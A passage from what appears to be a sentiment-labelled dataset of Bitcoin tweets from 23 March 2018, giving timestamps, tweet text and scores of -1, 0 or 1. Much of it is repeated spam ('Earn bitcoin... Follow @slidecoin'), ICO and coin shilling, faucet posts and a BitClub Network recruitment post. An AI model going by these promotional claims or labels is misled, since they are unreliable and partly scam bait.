ethereum = $516.277 / 419.036€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:10:05 +0000 2018,@_Kevin_Pham What if #bitcoin is #fightclub and #Satoshi is tyler durden and craig is Edward Norton,0.0 +Fri Mar 23 05:11:11 +0000 2018,"@Cylinders_io Great project, impressive level! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 05:11:11 +0000 2018,@zebpay TCC (the champcoin) is best crypto currency i love #tcc #bitcoin #BTC #xrp,1.0 +Fri Mar 23 05:11:21 +0000 2018,"฿ value over 3 months: --40.63%, ($-5757.95) [Currently $8412.055] #bitcoin",0.0 +Fri Mar 23 05:11:26 +0000 2018,Bitcoin value: $8420.94,0.0 +Fri Mar 23 05:11:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:11:54 +0000 2018,@emiliakraft My last sugar baby invested my sugar into bitcoin lmao,1.0 +Fri Mar 23 05:12:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:12:49 +0000 2018,@stephanlivera @pierre_rochard Unix Philosophy is timeless. Bitcoin and *nix are like milk and cookies.,0.0 +Fri Mar 23 05:12:55 +0000 2018,"""You have to be willing to accept some risk in your Bitcoin transactions in order to scale it globally."" - @VinnyLingham @Satoshis_Vision",1.0 +Fri Mar 23 05:12:56 +0000 2018,@JohnLoveTheKing Facts and bitcoin LoL,1.0 +Fri Mar 23 05:13:05 +0000 2018,I just won free 15 satoshi from WeLoveBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 05:13:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:14:12 +0000 2018,@zerohedge China bitcoin and pedophilia seem to be competing for first to kill the dollar.,1.0 +Fri Mar 23 05:14:13 +0000 2018,"@PhilakoneCrypto in deleted video you say ""always assume parallel with bitcoin"" why and what's the significance?",0.0 +Fri Mar 23 05:14:22 +0000 2018,"@twobitidiot I like the idea, but what country uses Bitcoin as a reserve currency?",0.0 +Fri Mar 23 05:14:41 +0000 2018,"Current Bitcoin Price = $9423.79 --- Includes Sum of Forks, Core $8399.00 (89.13%) + Cash $967.36 (10.27%) + Gold $57.43 (0.61%)",0.0 +Fri Mar 23 05:14:47 +0000 2018,"""Bitcoin Core is starting to look somewhat like a pyramid scheme."" - @ryanxcharles",0.0 +Fri Mar 23 05:15:02 +0000 2018,"The current price of Bitcoin is $8436.79. +The current price of BCash is $970.839, or 0.115725 BTC",0.0 +Fri Mar 23 05:15:12 +0000 2018,@RealMattCouch Do you accept bitcoin...serious question,0.0 +Fri Mar 23 05:15:21 +0000 2018,Whoever invests heavy this year in crypto( into the right coins) is going to be rich as fuck next year. #crypto #bitcoin #zec #bat $xmr $ltc,1.0 +Fri Mar 23 05:15:23 +0000 2018,"@SKYFchain +Register now before its too late, avail the 30% off +#skyfchain #Crowdsale #Bitcoin #Blockchain",-1.0 +Fri Mar 23 05:15:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:15:34 +0000 2018,@vianry Bitcoin?,0.0 +Fri Mar 23 05:15:40 +0000 2018,"@yahaya_aminu Good currency ditcoin Bitcoin is 1 year $1,000 crores now live rate $3 invest now ditcoin better future",1.0 +Fri Mar 23 05:15:53 +0000 2018,@USATODAY Fortunately we’ve got Bitcoin,1.0 +Fri Mar 23 05:15:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:16:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:16:07 +0000 2018,Current price of Bitcoin is $8418.82 #Bitcoin #Bithound,0.0 +Fri Mar 23 05:17:02 +0000 2018,"Bitcoin Cash BCH Current Price: +$970,839 +1 Hour: -0.34 % | 24 Hours: -7.55 % | 7 Days: 5.32 % +#bch #bitcoin cash",0.0 +Fri Mar 23 05:17:22 +0000 2018,"""You can't steal the Bitcoin brand. It's a permissionless world."" @VinnyLingham",0.0 +Fri Mar 23 05:18:11 +0000 2018,Coinbase Is In Talks to Buy One of Bitcoin's Best Funded Startups - CoinDesk -,1.0 +Fri Mar 23 05:18:54 +0000 2018,"Bitcoin is dead, crypto tweeter are fake and you are all going to be rekt. Enjoy !",-1.0 +Fri Mar 23 05:18:55 +0000 2018,"#Bitcoin #VisionOfSatoshi conference “while I don’t know what the right block size is, capping it @ 1mb is silly” @VinnyLingham",-1.0 +Fri Mar 23 05:19:27 +0000 2018,"@Bitcoin Good luck 👍. +Lot of investesrs are thinking Bit will go to 2000$ for sure end of December .can any one can advise the thoughts ?",1.0 +Fri Mar 23 05:19:55 +0000 2018,"mEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:19:56 +0000 2018,At @BrisbaneAirport - no one accepts Bitcoin. #FakeNews,0.0 +Fri Mar 23 05:20:03 +0000 2018,"1 bitcoin = $8435.82 / 6846.933€ +1 bitcoin-cash = $971.063 / 788.163€ +1 ethereum = $516.793 / 419.455€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:20:12 +0000 2018,"$BTC 💵 price: $8435.82 1.00000BTC +1h: -0.44% 🔻 +1d: -6.73% 🔻 +7d: +2.83% 📈 +👾 #Bitcoin 24h volume: $5,511,710,000",0.0 +Fri Mar 23 05:20:25 +0000 2018,BB-8 is a bitcoin farmer,0.0 +Fri Mar 23 05:20:45 +0000 2018,M0mchil's external bitcoin miner idea has solved a lot of housekeeping data required. It will keep nagging the CPU!,0.0 +Fri Mar 23 05:22:36 +0000 2018,"any1 knows anything about bitcoin?,i receive emails from them daily asking me 2 join",0.0 +Fri Mar 23 05:22:46 +0000 2018,@d_crypto0 @Yorkyor30444439 @TheCryptoDog I mean... 6 million bitcoin... lmao don’t worry I know that’s fake af,-1.0 +Fri Mar 23 05:22:47 +0000 2018,"If you let me order coffee after dinner you’re fired. + +#bitcoin",0.0 +Fri Mar 23 05:23:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:23:49 +0000 2018,@zebpay Tcc ( the champ coin) time ka bitcoin hoga,0.0 +Fri Mar 23 05:23:54 +0000 2018,#cryptocurrencies #crypto #bitcoin No trades today just HODL for Correction,0.0 +Fri Mar 23 05:24:16 +0000 2018,"The current value of BTC at 15:24:07 on 23/03/2018 (AEST) is $10,870.00 AUD. +#bitcoin #australia",0.0 +Fri Mar 23 05:24:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:24:56 +0000 2018,@SanjayP33580371 I support bitcoin and regulate it.,0.0 +Fri Mar 23 05:25:04 +0000 2018,"@nikzh @vermorel The one who bet against technology usually is a loser. :) + +#bitcoicash is #bitcoin and will scale to the world",1.0 +Fri Mar 23 05:25:30 +0000 2018,Lol just got offered a scam job from a “bitcoin” company. Come on lads try harder,1.0 +Fri Mar 23 05:25:36 +0000 2018,"Fri Mar 23 06:25:21 2018 (28:56) +USD : 8379.34 +Wght: 0.42 +Blk#: 514765 +Size: 1090.2 KB +TXs: 2420 +Pool: 330 (0.5 MB) +#bitcoin",0.0 +Fri Mar 23 05:25:43 +0000 2018,“There is a lot of headroom to go!” -@VinnyLingham on Bitcoin Cash. “Will get a lot of traction in the payment space.”,0.0 +Fri Mar 23 05:25:48 +0000 2018,My PayPal and my bitcoin wallet are both jumpin like Jordan let’s keep this shit stackin,-1.0 +Fri Mar 23 05:26:28 +0000 2018,Our #bitcoin atm at #Chinatown is now back online. Do drop by and feel free to come in to say hi. #bitcoinsingapore,1.0 +Fri Mar 23 05:26:30 +0000 2018,"@liluzifresh26 Sure they can, for example, I am Positive Bitcoin will end it's Negative spiral downwards.",1.0 +Fri Mar 23 05:26:33 +0000 2018,@Cryptopia_NZ @ColossusCoinXT Please add Bitcoin Privat...,0.0 +Fri Mar 23 05:26:37 +0000 2018,New #bitcoin block 00000000000000000038933efa99946d8e7e25e8c5340a25782d0e3663232353 mined at height 514765.,1.0 +Fri Mar 23 05:26:43 +0000 2018,"paperapapera1973@gmail.com Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:26:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:27:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:27:37 +0000 2018,"1e1015d2f6bd97e430f5a44e44d315f895ff06e1844ed426707a7c36a082be94/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 05:28:18 +0000 2018,I just won free 20 satoshi from GalaxyBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 05:28:26 +0000 2018,I just won free 10 satoshi from PlayBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 05:28:30 +0000 2018,Unbanked around the world — #UnbankedX system will help them all effortlessly #ICO #DOCHECKITOUT #BITCOIN #BLOCKCHAIN,0.0 +Fri Mar 23 05:28:33 +0000 2018,@cz_binance Please add Bitcoin Privat...,0.0 +Fri Mar 23 05:28:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:29:11 +0000 2018,Tomorrow would be a great day for Bitcoin to tank.,1.0 +Fri Mar 23 05:29:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:29:40 +0000 2018,"#Bitcoin price failed to break past the $9,000 level after news of a potential shutdown of #Binance in Japan broke out.",-1.0 +Fri Mar 23 05:29:51 +0000 2018,@brs_ogz Buy bitcoin,0.0 +Fri Mar 23 05:30:02 +0000 2018,"Bitcoin:$8423.74 +Ethereum:$516.024 +Bitcoin Cash:$969.07 +Litecoin:$158.534 +Ripple:$0.632696 +IOTA:$1.27537",0.0 +Fri Mar 23 05:30:02 +0000 2018,"1 bitcoin = $8422.59 / 6836.195€ +1 bitcoin-cash = $969.07 / 786.545€ +1 ethereum = $515.719 / 418.583€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:30:04 +0000 2018,One Bitcoin now worth $8381.97@bitstamp. High $9046.180. Low $8342.000. Market Cap $141.942 Billion #bitcoin,1.0 +Fri Mar 23 05:30:06 +0000 2018,"Eventually, banks will welcome Bitcoin, just like telcos found a way to make a dime on the Internet.",1.0 +Fri Mar 23 05:30:25 +0000 2018,#ADA Price is 0.00002252 (-0.00000020) #BTC / 0.189038 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:26 +0000 2018,#EOS Price is 0.00077749 (-0.00000575) #BTC / 6.52578 (-0.07241) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:27 +0000 2018,#SUB Price is 0.00004583 (-0.00000014) #BTC / 0.384062 (-0.00196) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:29 +0000 2018,#XEM Price is 0.00003290 (-0.00000016) #BTC / 0.275727 (-0.00183) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:29 +0000 2018,#DASH Price is 0.0474443 (-0.00018450) #BTC / 397.633 (-2.29000) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:54 +0000 2018,@cz_binance CZ can you please add BItcoin Private. It adds exatly THE feutures that are missing in Bitcoin,-1.0 +Fri Mar 23 05:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8422.59 as of Fri Mar 23 00:31:09 CDT 2018",0.0 +Fri Mar 23 05:31:22 +0000 2018,@yahaya_aminu Very very exclusive currency the ditcoin future Bitcoin very soon now buy ditcoin $3,1.0 +Fri Mar 23 05:31:27 +0000 2018,Bitcoin value: $8396.8,0.0 +Fri Mar 23 05:31:48 +0000 2018,"""The idea that Bitcoin Cash doesn't have competent developers is a BS narrative."" - @VinnyLingham at @Satoshis_Vision",1.0 +Fri Mar 23 05:32:18 +0000 2018,"@CrypConsigliere So non-volatile but will outperform Bitcoin, where will the returns come from if there's no risk?",0.0 +Fri Mar 23 05:32:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:33:08 +0000 2018,@CollectiveEvol Bitcoin.,0.0 +Fri Mar 23 05:33:11 +0000 2018,Current price of Bitcoin is $8412.06 #Bitcoin #Bithound,0.0 +Fri Mar 23 05:33:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:34:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:34:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:08 +0000 2018,",Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:39 +0000 2018,@jakeseelye @Socal_crypto It's about that time. Time to decide whether to place that 3rd bid or sleep on it. Just another day in bitcoin.,0.0 +Fri Mar 23 05:36:06 +0000 2018,@lucx946 @Castle_CSTL @bitcoinprivate There is CSTL in Bitcoin private logo. And then there are Castle like design on the btcp logo.,0.0 +Fri Mar 23 05:36:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:37:04 +0000 2018,Thanks @ryanxcharles & @VinnyLingham for your insights on both sides of the #Bitcoin debate @Satoshis_Vision 🌏✌️🤙,1.0 +Fri Mar 23 05:37:08 +0000 2018,@zebpay THE CHAMPCOIN HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY,0.0 +Fri Mar 23 05:37:10 +0000 2018,@Free_Ross And the beginning stages of their plan to defeat bitcoin!,0.0 +Fri Mar 23 05:38:12 +0000 2018,Assuming Bitcoin needs use cases to become ' a thing' is silly. It just needs enough rich people and banks to think it's good for them.,1.0 +Fri Mar 23 05:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:39:18 +0000 2018,@cryptostardust @afrobeng is bitcoin an ERC20 token sir? 😂 😂 😂,0.0 +Fri Mar 23 05:39:30 +0000 2018,"BTC,ETH,ETC,LTC,BCH,MONA +Someone may do it, so please send it  +#Bitcoin #VirtualCurrency",0.0 +Fri Mar 23 05:40:02 +0000 2018,"1 bitcoin = $8421.7 / 6835.472€ +1 bitcoin-cash = $969.943 / 787.254€ +1 ethereum = $515.703 / 418.57€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:40:04 +0000 2018,EWangBiCoin ( $EWC ) will be listed on CoinExchange #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews,0.0 +Fri Mar 23 05:40:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:40:32 +0000 2018,"""Lost coins only make everyone else's coins worth slightly more. Think of it as a donation to everyone."" - Satoshi Nakamoto #bitcoin #quote",1.0 +Fri Mar 23 05:41:30 +0000 2018,".Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:41:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:41:42 +0000 2018,@creepy_von_evil ...I take payment in cash or bitcoin.,0.0 +Fri Mar 23 05:41:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:42:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin good +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:42:28 +0000 2018,We need Bitcoin to stay over $8300. Im already starting to see the vacuum on alts that have risen over this last week.,-1.0 +Fri Mar 23 05:42:43 +0000 2018,@zmanbrianzane You're investing in Bitcoin?,0.0 +Fri Mar 23 05:42:45 +0000 2018,"So fucking sick of this market. + +#cryptocurrency #crypto #BTC #bitcoin",-1.0 +Fri Mar 23 05:43:31 +0000 2018,@youre_the_goat I’d have pulled out of bitcoin earlier,0.0 +Fri Mar 23 05:43:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:43:55 +0000 2018,@FlyGuyInTheSky Bitcoin Stinks,-1.0 +Fri Mar 23 05:43:57 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:44:14 +0000 2018,@zebpay TCC is Next BITCOIN of India.... The Champcoin is best cryptocruncy,1.0 +Fri Mar 23 05:44:23 +0000 2018,"0,00001293 Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:44:33 +0000 2018,@AandGShow PLEASE!!! Can we just talk about bitcoin or something...pleeeaaassse?,0.0 +Fri Mar 23 05:44:36 +0000 2018,"Optimal tx fee: 5 satoshi per byte. +BTC : $8389 / €6801 / £5943 @ Block 514765. +Market Cap: 143.22B USD. #Bitcoin #Market",0.0 +Fri Mar 23 05:46:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:46:13 +0000 2018,@pierre_rochard what can you buy with bitcoin?,0.0 +Fri Mar 23 05:47:56 +0000 2018,"@rogerkver @Falkvinge Rick Falkvinge is the man. Watched him on YouTube, next day bought Bitcoin Cash.",0.0 +Fri Mar 23 05:48:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:49:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:50:02 +0000 2018,"BTC-STEEM AskRate: 0.00024274 #Bittrex #STEEM $STEEM #STEEM #altcoin #altcoins #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 05:50:03 +0000 2018,"1 bitcoin = $8440.42 / 6850.666€ +1 bitcoin-cash = $970.377 / 787.606€ +1 ethereum = $518.991 / 421.239€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:50:03 +0000 2018,"Lottery in Bitcoin! ? +Prize money and can be purchased from all over the world in the Bitcoin that can be received in any country ! ! +bitcoi",0.0 +Fri Mar 23 05:51:28 +0000 2018,Bitcoin value: $8398.47,0.0 +Fri Mar 23 05:51:36 +0000 2018,@sprenten @jucoplayerinfo Oh hi. Ok. Ill send you bitcoin.,-1.0 +Fri Mar 23 05:51:53 +0000 2018,"BITCOIN FACTS: On the first 5 years of #Bitcoin existence, it grew from $0 to $1,000",1.0 +Fri Mar 23 05:53:09 +0000 2018,@CarpeNoctom and I dont even know if that guy knows what bitcoin is,0.0 +Fri Mar 23 05:54:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:54:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:54:25 +0000 2018,#Bitcoin could entirely change the way our means of exchange works #bitcoinsfuture #bitcoin #btc #bitcoinsfuture,0.0 +Fri Mar 23 05:54:45 +0000 2018,@zebpay Tcc is the king of cryptocurrency..... And next Bitcoin from India,0.0 +Fri Mar 23 05:55:32 +0000 2018,@IAndrewIvers Don’t buy bitcoin,0.0 +Fri Mar 23 05:56:12 +0000 2018,"@NickSzabo4 👏👏 +Bitcoin is proof of that statement...",0.0 +Fri Mar 23 05:56:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:56:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet +3. use ABI648 as ref",1.0 +Fri Mar 23 05:56:44 +0000 2018,"@cryptomanran Agreed, there are plenty of other exchanges Japanese can buy bitcoin.",-1.0 +Fri Mar 23 05:56:45 +0000 2018,"@MarkYusko So... what say you , Buy Bitcoin now or wait a little longer?",-1.0 +Fri Mar 23 05:57:21 +0000 2018,How/when/where to invest in bitcoin and altcoins.,0.0 +Fri Mar 23 05:57:50 +0000 2018,"i think bitcoin ... may be significant perversely precisely because it takes a lot of time to mine, or to make headway ...",1.0 +Fri Mar 23 05:58:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:58:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27834.002486 | LITECOIN(MCDTBC) R$574.99000000,0.0 +Fri Mar 23 05:59:06 +0000 2018,"#Vrmed @vr1med creating the future of vision equipment, top-tier VR headset. #ICO #crowdsale #bitcoin #ethereum #token",0.0 +Fri Mar 23 05:59:14 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:59:23 +0000 2018,If you would like to donate BitCoin towards the cost of my hosting send to: -> 1KBw1KzVDkqkipaDMVAxfMa5gzzwGzUXuH | #SupportAI #Anonymous,0.0 +Fri Mar 23 05:59:40 +0000 2018,What do you think will be the next big success like bitcoin? #cryptocurrency #ico,1.0 +Fri Mar 23 05:59:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:00:00 +0000 2018,"This just in: Bitcoin is rising! +Current Rate: 8401.86 USD = 1 BTC",0.0 +Fri Mar 23 06:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,443.26, market cap of $142,982,909,952 (44.35%), and 24 hr vol. of $5,521,670,000 (37.67%)",0.0 +Fri Mar 23 06:00:02 +0000 2018,"Bitcoin - BTC +Price: $8,443.26 +Change in 1h: -0.07% +Market cap: $142,982,909,952.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 06:00:02 +0000 2018,"Bitcoin:$8437.14 +Ethereum:$518.863 +Bitcoin Cash:$971.23 +Litecoin:$158.259 +Ripple:$0.634721 +IOTA:$1.27298",0.0 +Fri Mar 23 06:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,401.86, EUR 6,812.67",-1.0 +Fri Mar 23 06:00:03 +0000 2018,Current BTC Dominance: 44.32% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 06:00:03 +0000 2018,"1 bitcoin = $8437.14 / 6848.004€ +1 bitcoin-cash = $970.355 / 787.588€ +1 ethereum = $518.863 / 421.135€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:00:04 +0000 2018,"23Mar2018 06:00 UTC #Bitcoin #Blockchain status - Last 24h: 135 blocks mined - 1,036,281 BTC output - 182,105 transactions",0.0 +Fri Mar 23 06:00:04 +0000 2018,"Keep centered on the story which will become Bitcoin's destiny: It is not just a money, it is an innovation, a protocol, a technology.",0.0 +Fri Mar 23 06:00:01 +0000 2018,"Mar 22, 2018 11:00PM #Bitcoin Price: +USD 8643.95 | EUR 7021.63 | JPY 918005.47",0.0 +Fri Mar 23 06:00:11 +0000 2018,@jolb_ Top 10 Emotions The Biggest Bitcoin Miners Doesn’t Want You To Know About,1.0 +Fri Mar 23 06:00:12 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8413.78/$8417.76 #Bitstamp +$8408.90/$8411.29 #Kraken +⇢$-8.86/$-2.49 +$8365.08/$8449.17 #Coinbase +⇢$-52.68/$35.39",0.0 +Fri Mar 23 06:00:18 +0000 2018,@zebpay Tcc is next bitcoin,0.0 +Fri Mar 23 06:00:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:00:26 +0000 2018,#Bitcoin Price 8381.02 USD via Chain,0.0 +Fri Mar 23 06:00:28 +0000 2018,#DASH Price is 0.0477892 (+0.00034490) #BTC / 401.096 (+3.46300) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:29 +0000 2018,#ADA Price is 0.00002259 (+0.00000007) #BTC / 0.189612 (+0.00057) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:29 +0000 2018,#SUB Price is 0.00004558 (-0.00000025) #BTC / 0.382547 (-0.00151) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:29 +0000 2018,#XEM Price is 0.00003291 (+0.00000001) #BTC / 0.276204 (+0.00048) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:30 +0000 2018,"BTC hourly update +$8409.78 | -0.0025%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 06:00:30 +0000 2018,#EOS Price is 0.00078247 (+0.00000498) #BTC / 6.56728 (+0.04150) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 06:00:35 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:00:52 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:00:53 +0000 2018,"#Bitcoin $8,418.00 v #BitcoinCash $968.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 15:00JST",0.0 +Fri Mar 23 06:00:54 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:01:16 +0000 2018,Current price of Bitcoin is $8382.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 06:01:35 +0000 2018,Current price of Bitcoin is $8382.00.,0.0 +Fri Mar 23 06:01:36 +0000 2018,Bitcoin 8382.00 $,0.0 +Fri Mar 23 06:02:07 +0000 2018,Bitcoin is $8382.00 🔔 $BTC,0.0 +Fri Mar 23 06:02:12 +0000 2018,"#RamenCoin $RAMEN #airdrop #bounty #ICO #ethereum #blockchain #bitcoin #BTS #cryptocurrency #altcoin +@mskumar230078",0.0 +Fri Mar 23 06:02:15 +0000 2018,"It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt",1.0 +Fri Mar 23 06:02:25 +0000 2018,Current price of Bitcoin is $8382.00,0.0 +Fri Mar 23 06:02:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:02:39 +0000 2018,"Bitcoin percentage of market cap: 44.35 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 06:02:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:03:02 +0000 2018,"CIBUS network is a block chain based eco system on food and health supplements' +#bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS",0.0 +Fri Mar 23 06:03:05 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK! !",1.0 +Fri Mar 23 06:03:14 +0000 2018,Current price of #Bitcoin is $8382.00,0.0 +Fri Mar 23 06:03:16 +0000 2018,CIBUS network is a block chain based eco system on food and health supplements #bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS,0.0 +Fri Mar 23 06:03:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:04:21 +0000 2018,Not afraid of heights - afraid of widths. #bitcoin #mining #free,1.0 +Fri Mar 23 06:04:22 +0000 2018,Bitcoin 